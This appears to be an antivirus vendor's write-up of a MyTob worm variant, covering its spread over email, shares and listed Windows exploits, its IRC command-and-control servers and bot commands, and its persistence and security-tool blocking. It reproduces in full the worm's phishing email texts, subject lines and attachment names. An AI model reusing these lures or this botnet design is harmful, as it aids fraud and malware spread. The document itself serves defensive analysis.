Alias/esBackdoor.Win32.Aimbot.bf [KAV], W32.Mytob@mm [Norton], W32/Mytob-FV [Sophos], W32/MyTob.HD-mm, W32/Mytob.hd@MM [McAfee], W32/MyTob.PM@mm, W32/Mytob.PM@mm [Fprot], Worm.Mytob.KC [ClamAV], WORM_MYTOB.NC [Trend] |
Detailed AnalysisAll MyTob viruses have these characteristics:
- copy itself to the local system
- search for email addresses in files
- send itself by SMTP [self contained engine]
Some variants have these additional characteristics:
- connect with an IRC server to receive instructions
or await commands from a malicious user
- prevent the infected system from connecting to update
servers and various other security related web pages
- this is done by hacking the local "hosts"
file and adding entries redirecting the call to specific
web sites by domain name to the local host
- try to connect with random IP addresses to infect
systems using an RPC DCOM / LSASS exploit combo
The variants will differ slightly with regard to packed
file size and actual file names created on the host
however the functionality of the viruses remain the
same.
Specific Properties
This variant of MyTob includes backdoor components
and exploits against numerous vulnerabilities. This
is an effort to maximize the spread of the particular
variant. This variant spreads through three significant
means of propagation:
- SMTP email as an attachment
- Network shares
- Vulnerabilities and exploits
The third method includes these attack vectors -
|
Type
|
MS Bulletin
|
Port
|
|
WebDav
|
MS03-007
|
80
|
|
NetBios / Network shares
|
|
139
|
|
Windows NT password dictionary
attack
|
|
445
|
|
RPC DCom (1 and 2)
|
MS03-039
|
135, 139, 445
|
|
MS SQL exploit
|
MS02-039
|
1433, 1434
|
|
LSASS exploit
|
MS04-044
|
135, 139, 445
|
|
uPNP exploit
|
MS05-048
|
135, 139, 445, 1025
|
|
Workstation Service exploit
|
MS03-049
|
135, 139, 445
|
|
ASN.1 smb exploit
|
MS04-007
|
135, 139, 445
|
- writes the file "SQLSRV.exe" to the
System32 folder and registers to run at Windows
logon
- modifies the registry to allow running the virus,
and to not block it via built-in Windows XP firewall
- connects to the IRC server 'irc.blackcarder.net'
to receive instructions from a malicious user
- sends emails with one of these subject lines -
Your password has been updated
Your password has been successfully updated
You have successfully updated your password
Your new account password is approved
Your Account is Suspended
*DETECTED* Online User Violation
Your Account is Suspended For Security Reasons
Warning Message: Your services near to be closed.
Important Notification
Members Support
Security measures
Email Account Suspension
Notice of account limitation
- sends emails with one of four HTML format body
texts where %s is a portion of the recipient's email
address; in the first instance, it is the prefix
and in the remaining occurrences, it is the domain
-
Dear user %s,
You have successfully updated the password
of your %s account.
If you did not authorize this change or if
you need assistance with your account, please
contact %s customer service at: %s
Thank you for using %s!
The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s |
Dear user %s,
It has come to our attention that your %s
User Profile ( x ) records are out of date.
For further details see the attached document.
Thank you for using %s!
The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s |
Dear %s Member,
We have temporarily suspended your email account
%s.
This might be due to either of the following
reasons:
1. A recent change in your personal information
(i.e. change of address).
2. Submiting invalid information during the
initial sign up process.
3. An innability to accurately verify your
selected option of subscription due to an
internal error within our processors.
See the details to reactivate your %s account.
Sincerely,The %s Support Team
+++ Attachment: No Virus (Clean)
+++ %s Antivirus - www.%s |
Dear %s Member,
Your e-mail account was used to send a huge
amount of unsolicited spam messages during
the recent week. If you could please take
5-10 minutes out of your online experience
and confirm the attached document so you will
not run into any future problems with the
online service.
If you choose to ignore our request, you leave
us no choice but to cancel your membership.
Virtually yours,
The %s Support Team
+++ Attachment: No Virus found
+++ %s Antivirus - www.%s |
- spoofs the sender email address to match one of
these names as a prefix to the from email address
-
support
administrator
mail
service
admin
info
register
webmaster
- the attached file is a .ZIP archive with one of
these names -
updated-password
email-password
new-password
password
approved-password
account-password
accepted-password
important-details
account-details
email-details
account-info
document
readme
account-report
- connects to an IRC server named 'whitman.majesticwin.com'
and connects to the channel "whitman2"
to await instructions and commands from a malicious
user
- supports the following commands via IRC server
connection -
| login |
threads |
sub |
| kill |
logout |
who |
| remove |
bye |
testdlls |
| cel |
uptime |
installed |
| version |
status |
secure |
| sec |
unsecure |
unsec |
| process |
list |
kill |
| status |
hide |
create |
| nickupdate |
randnick |
rand |
| exploitftpd |
eftpd |
socks4 |
| redirect |
netstatp |
nsp |
| iestart |
ies |
encrypt |
| enc |
join |
part |
| raw |
prefix |
resolve |
| dns |
currentip |
cip |
| stats |
banner |
ban |
| advscan |
asc |
scanall |
| lsascan |
lsa |
ntscan |
| nts |
wksescan |
wkse |
| wksoscan |
wkso |
pnpscan |
| pnp |
flusharp |
farp |
| flushdns |
fdns |
pstore |
| pst |
sysinfo |
netinfo |
| driveinfo |
total |
mirccmd |
| mirc |
system |
sys |
| file |
type |
cat |
| exists |
del |
rmdir |
| move |
copy |
attrib |
| open |
down |
wget |
| update |
upd |
else |
| nick |
host |
uptime |
| recordup |
rup |
private |
- terminates threads and applications matching a
built-in file name dictionary of common security
and antivirus apps
Miscellaneous
This file has an icon that resembles an installation
or setup package. Properties for the virus file are
"Microsoft Service Pack 2 Moniter".
|
